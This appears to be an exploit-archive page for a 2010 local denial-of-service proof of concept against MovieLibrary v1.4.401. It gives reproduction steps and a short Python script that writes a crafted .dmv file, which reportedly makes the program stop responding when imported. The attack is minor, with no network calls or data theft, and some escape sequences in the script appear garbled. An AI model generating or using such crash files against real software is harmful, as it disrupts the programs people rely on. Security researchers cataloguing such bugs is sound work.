[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : MovieLibrary v1.4.401 Local Dos .dmv File
# Published : 2010-04-14
# Author : chap0
# Previous Title : Remote Exploit Against the Aircrack-NG Tools svn r1675
# Next Title : Book Library v1.4.162 Local Dos .bkd File


# Exploit Title: MovieLibrary Local Dos .dmv file
# Date: April 14, 2010
# Software Link: [http://wensoftware.com/]
# Version: v1.4.401
# Tested on: Windows XP SP3
# Author: chap0 
# Email: chap0x90[at]gmail[dot]com
# Site: [www.setfreesecurity.com]
# 
# At the top: Click -> New -> Open
# Open the newly created dmv file
# Click File ->  Import Database
# Program will stop responding after about 5 sec
#
# Greetz to the Exploit-DB Crew and More Coffee!
# I AM YOU
#
#!/usr/bin/env python
import time

print "Press Play >n"
time.sleep(1)

VHS=open('oldies.dmv', 'w')
VHS.write('x00')
VHS.close()

print 'Running Time: Approximately 5 sec till DoS.n'